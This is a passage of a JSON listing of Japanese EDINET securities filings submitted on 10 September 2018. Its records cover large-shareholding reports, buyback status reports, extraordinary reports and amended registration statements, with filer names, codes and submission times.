"filerName": "日本碍子株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "110000",
"docTypeCode": "080",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 13:43",
"docDescription": "発行登録書(株券、社債券等)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 188,
"docID": "S100E2WQ",
"edinetCode": "E24826",
"secCode": null,
"JCN": "3120001146521",
"filerName": "株式会社A&A planning",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "020002",
"docTypeCode": "350",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 13:43",
"docDescription": "変更報告書(短期大量譲渡)",
"issuerEdinetCode": "E03145",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 189,
"docID": "S100E2WR",
"edinetCode": "E34391",
"secCode": null,
"JCN": "2120001215723",
"filerName": "株式会社MUKUMOTO",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "010000",
"docTypeCode": "350",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 13:46",
"docDescription": "大量保有報告書",
"issuerEdinetCode": "E03145",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 190,
"docID": "S100E330",
"edinetCode": "E01794",
"secCode": "67730",
"JCN": "1020001086473",
"filerName": "パイオニア株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "053000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 13:48",
"docDescription": "臨時報告書",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第19条第2項第19号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 191,
"docID": "S100E2Y9",
"edinetCode": "E30598",
"secCode": "32970",
"JCN": "2250001005979",
"filerName": "株式会社東武住販",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "030001",
"docTypeCode": "130",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 13:51",
"docDescription": "訂正有価証券報告書-第35期(平成29年6月1日-平成30年5月31日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100E1BM",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 192,
"docID": "S100E33O",
"edinetCode": "E30598",
"secCode": "32970",
"JCN": "2250001005979",
"filerName": "株式会社東武住販",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "042100",
"docTypeCode": "135",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 13:57",
"docDescription": "確認書",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100E2Y9",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "0",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 193,
"docID": "S100E33S",
"edinetCode": "E00008",
"secCode": "13790",
"JCN": "6100001003151",
"filerName": "ホクト株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "170000",
"docTypeCode": "220",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 14:06",
"docDescription": "自己株券買付状況報告書(法24条の6第1項に基づくもの)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 194,
"docID": "S100E33I",
"edinetCode": "E03810",
"secCode": null,
"JCN": "6010001074037",
"filerName": "野村證券株式会社",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "010000",
"docTypeCode": "350",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 14:07",
"docDescription": "大量保有報告書",
"issuerEdinetCode": "E24073",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 195,
"docID": "S100E345",
"edinetCode": "E01003",
"secCode": "41850",
"JCN": "6010401082746",
"filerName": "JSR株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "170000",
"docTypeCode": "220",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 14:27",
"docDescription": "自己株券買付状況報告書(法24条の6第1項に基づくもの)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 196,
"docID": "S100E2TN",
"edinetCode": "E02570",
"secCode": "80770",
"JCN": "7120001048994",
"filerName": "小林産業株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "170000",
"docTypeCode": "220",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 14:33",
"docDescription": "自己株券買付状況報告書(法24条の6第1項に基づくもの)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 197,
"docID": "S100E34I",
"edinetCode": "E05699",
"secCode": "38530",
"JCN": "2010701012175",
"filerName": "アステリア株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "170000",
"docTypeCode": "220",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 14:55",
"docDescription": "自己株券買付状況報告書(法24条の6第1項に基づくもの)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 198,
"docID": "S100E2BX",
"edinetCode": "E32761",
"secCode": null,
"JCN": null,
"filerName": "北山 雅一",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "010002",
"docTypeCode": "350",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 15:00",
"docDescription": "変更報告書",
"issuerEdinetCode": "E32619",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 199,
"docID": "S100E34E",
"edinetCode": "E34285",
"secCode": "34960",
"JCN": "9011001062508",
"filerName": "株式会社アズーム",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "024001",
"docTypeCode": "040",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 15:00",
"docDescription": "訂正有価証券届出書(新規公開時)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100DYI0",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 200,
"docID": "S100E2XY",
"edinetCode": "E32395",
"secCode": null,
"JCN": null,
"filerName": "VIS Advisors,LP",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "010000",
"docTypeCode": "350",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 15:00",
"docDescription": "大量保有報告書",
"issuerEdinetCode": "E30126",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 201,
"docID": "S100E348",
"edinetCode": "E02767",
"secCode": "36120",
"JCN": "4140001024328",
"filerName": "株式会社ワールド",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "024001",
"docTypeCode": "040",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 15:00",
"docDescription": "訂正有価証券届出書(新規公開時)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100DZJX",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 202,
"docID": "S100E2C4",
"edinetCode": "E32760",
"secCode": null,
"JCN": "2120003011600",
"filerName": "合同会社フィンテックマネジメント",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "010002",
"docTypeCode": "350",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 15:01",
"docDescription": "変更報告書",
"issuerEdinetCode": "E32619",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 203,
"docID": "S100E2IX",
"edinetCode": "E04499",
"secCode": "95030",
"JCN": "3120001059632",
"filerName": "関西電力株式会社",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "020002",
"docTypeCode": "350",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 15:01",
"docDescription": "変更報告書(短期大量譲渡)",
"issuerEdinetCode": "E03946",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 204,
"docID": "S100E349",
"edinetCode": "E02767",
"secCode": "36120",
"JCN": "4140001024328",
"filerName": "株式会社ワールド",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "020001",
"docTypeCode": "040",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 15:01",
"docDescription": "訂正有価証券届出書(通常方式)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100DZKG",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 205,
"docID": "S100E34B",
"edinetCode": "E02767",
"secCode": "36120",
"JCN": "4140001024328",
"filerName": "株式会社ワールド",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "053001",
"docTypeCode": "190",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 15:02",
"docDescription": "訂正臨時報告書",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第19条第2項第1号",
"parentDocID": "S100DZKI",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 206,
"docID": "S100E2BI",
"edinetCode": "E31866",
"secCode": null,
"JCN": null,
"filerName": "BENEFIT POWER INC.",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "010000",
"docTypeCode": "350",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 15:06",
"docDescription": "大量保有報告書",
"issuerEdinetCode": "E00745",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 207,
"docID": "S100E2A6",
"edinetCode": "E31866",
"secCode": null,
"JCN": null,
"filerName": "BENEFIT POWER INC.",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "010000",
"docTypeCode": "350",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 15:08",
"docDescription": "大量保有報告書",
"issuerEdinetCode": "E01088",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 208,
"docID": "S100E2X2",
"edinetCode": "E34365",
"secCode": null,
"JCN": null,
"filerName": "山中賢一",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "010002",
"docTypeCode": "350",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 15:20",
"docDescription": "変更報告書",
"issuerEdinetCode": "E02118",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 209,
"docID": "S100E34V",
"edinetCode": "E33699",
"secCode": null,
"JCN": null,
"filerName": "足立 秀之",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "090001",
"docTypeCode": "360",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 15:20",
"docDescription": "訂正報告書(大量保有報告書・変更報告書)",
"issuerEdinetCode": "E33583",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100E21O",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 210,
"docID": "S100E2X5",
"edinetCode": "E34365",
"secCode": null,
"JCN": null,
"filerName": "山中賢一",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "010002",
"docTypeCode": "350",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 15:21",
"docDescription": "変更報告書",
"issuerEdinetCode": "E02118",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 211,
"docID": "S100E30K",
"edinetCode": "E33853",
"secCode": null,
"JCN": "9290001041304",
"filerName": "株式会社レモンガスふくおか",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "090001",
"docTypeCode": "360",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 15:24",
"docDescription": "訂正報告書(大量保有報告書・変更報告書)",
"issuerEdinetCode": "E00424",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100DYIO",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 212,
"docID": "S100E2YE",
"edinetCode": "E00094",
"secCode": "19510",
"JCN": "3011001031955",
"filerName": "株式会社協和エクシオ",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "170000",
"docTypeCode": "220",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 15:27",
"docDescription": "自己株券買付状況報告書(法24条の6第1項に基づくもの)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 213,
"docID": "S100E2X8",
"edinetCode": "E34365",
"secCode": null,
"JCN": null,
"filerName": "山中賢一",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "010002",
"docTypeCode": "350",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 15:29",
"docDescription": "変更報告書",
"issuerEdinetCode": "E02118",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 214,
"docID": "S100E34J",
"edinetCode": "E34365",
"secCode": null,
"JCN": null,
"filerName": "山中賢一",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "090001",
"docTypeCode": "360",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 15:31",
"docDescription": "訂正報告書(大量保有報告書・変更報告書)",
"issuerEdinetCode": "E02118",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100E2UX",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 215,
"docID": "S100E34N",
"edinetCode": "E22460",
"secCode": "36350",
"JCN": "4020001061110",
"filerName": "株式会社コーエーテクモホールディングス",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "053000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 15:31",
"docDescription": "臨時報告書",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第19条第2項第2号の2",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 216,
"docID": "S100E2UV",
"edinetCode": "E26549",
"secCode": "29300",
"JCN": "8430001028254",
"filerName": "株式会社北の達人コーポレーション",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "170000",
"docTypeCode": "220",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 15:31",
"docDescription": "自己株券買付状況報告書(法24条の6第1項に基づくもの)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 217,
"docID": "S100E351",
"edinetCode": "E01496",
"secCode": "61350",
"JCN": "7013201005504",
"filerName": "株式会社 牧野フライス製作所",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "170000",
"docTypeCode": "220",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 15:35",
"docDescription": "自己株券買付状況報告書(法24条の6第1項に基づくもの)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 218,
"docID": "S100E2UB",
"edinetCode": "E05923",
"secCode": null,
"JCN": null,
"filerName": "コーペラティブ・ラボバンク・ウー・アー",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "100000",
"docTypeCode": "160",
"periodStart": "2018-01-01",
"periodEnd": "2018-12-31",
"submitDateTime": "2018-09-10 15:35",
"docDescription": "半期報告書",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "0",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 219,
"docID": "S100E30B",
"edinetCode": "E27510",
"secCode": null,
"JCN": "9011103004226",
"filerName": "合同会社城山21世紀投資",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "090001",
"docTypeCode": "360",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 15:36",
"docDescription": "訂正報告書(大量保有報告書・変更報告書)",
"issuerEdinetCode": "E04055",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S1002TXE",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 220,
"docID": "S100E2XI",
"edinetCode": "E24546",
"secCode": null,
"JCN": "8013301017357",
"filerName": "株式会社リトル・アイ",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "010002",
"docTypeCode": "350",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 15:37",
"docDescription": "変更報告書",
"issuerEdinetCode": "E33037",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100A01L",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 221,
"docID": "S100E30L",
"edinetCode": "E27510",
"secCode": null,
"JCN": "9011103004226",
"filerName": "合同会社城山21世紀投資",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "090001",
"docTypeCode": "360",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 15:37",
"docDescription": "訂正報告書(大量保有報告書・変更報告書)",
"issuerEdinetCode": "E04055",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S1003VEM",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 222,
"docID": "S100E30O",
"edinetCode": "E27510",
"secCode": null,
"JCN": "9011103004226",
"filerName": "合同会社城山21世紀投資",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "090001",
"docTypeCode": "360",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 15:42",
"docDescription": "訂正報告書(大量保有報告書・変更報告書)",
"issuerEdinetCode": "E04055",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S1005B5W",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 223,
"docID": "S100E310",
"edinetCode": "E02676",
"secCode": "81540",
"JCN": "4010001001752",
"filerName": "加賀電子株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "053000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 15:42",
"docDescription": "臨時報告書",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第19条第2項第3号,第19条第2項第8号の2",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 224,
"docID": "S100E30Y",
"edinetCode": "E27510",
"secCode": null,
"JCN": "9011103004226",
"filerName": "合同会社城山21世紀投資",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "090001",
"docTypeCode": "360",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 15:43",
"docDescription": "訂正報告書(大量保有報告書・変更報告書)",
"issuerEdinetCode": "E04055",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S1008VBB",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 225,
"docID": "S100E35C",
"edinetCode": "E01797",
"secCode": "67940",
"JCN": "8012801002521",
"filerName": "フォスター電機株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "170000",
"docTypeCode": "220",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 15:46",
"docDescription": "自己株券買付状況報告書(法24条の6第1項に基づくもの)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 226,
"docID": "S100E31D",
"edinetCode": "E34376",
"secCode": null,
"JCN": null,
"filerName": "脇田 栄一",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "010000",
"docTypeCode": "350",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 15:50",
"docDescription": "大量保有報告書",
"issuerEdinetCode": "E04055",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 227,
"docID": "S100E35I",
"edinetCode": "E34376",
"secCode": null,
"JCN": null,
"filerName": "脇田 栄一",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "010002",
"docTypeCode": "350",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 15:57",
"docDescription": "変更報告書",
"issuerEdinetCode": "E04055",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100E31D",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 228,
"docID": "S100E2VQ",
"edinetCode": "E33066",
"secCode": null,
"JCN": null,
"filerName": "金森 勉",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "010002",
"docTypeCode": "350",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 15:58",
"docDescription": "変更報告書",
"issuerEdinetCode": "E32990",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
